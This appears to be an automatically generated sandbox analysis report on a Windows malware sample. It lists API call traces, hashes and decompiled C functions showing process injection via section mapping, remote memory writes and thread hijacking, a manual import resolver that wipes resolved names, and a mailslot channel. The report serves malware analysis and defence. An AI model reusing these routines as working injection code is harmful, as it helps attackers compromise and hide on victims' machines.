  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}
APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
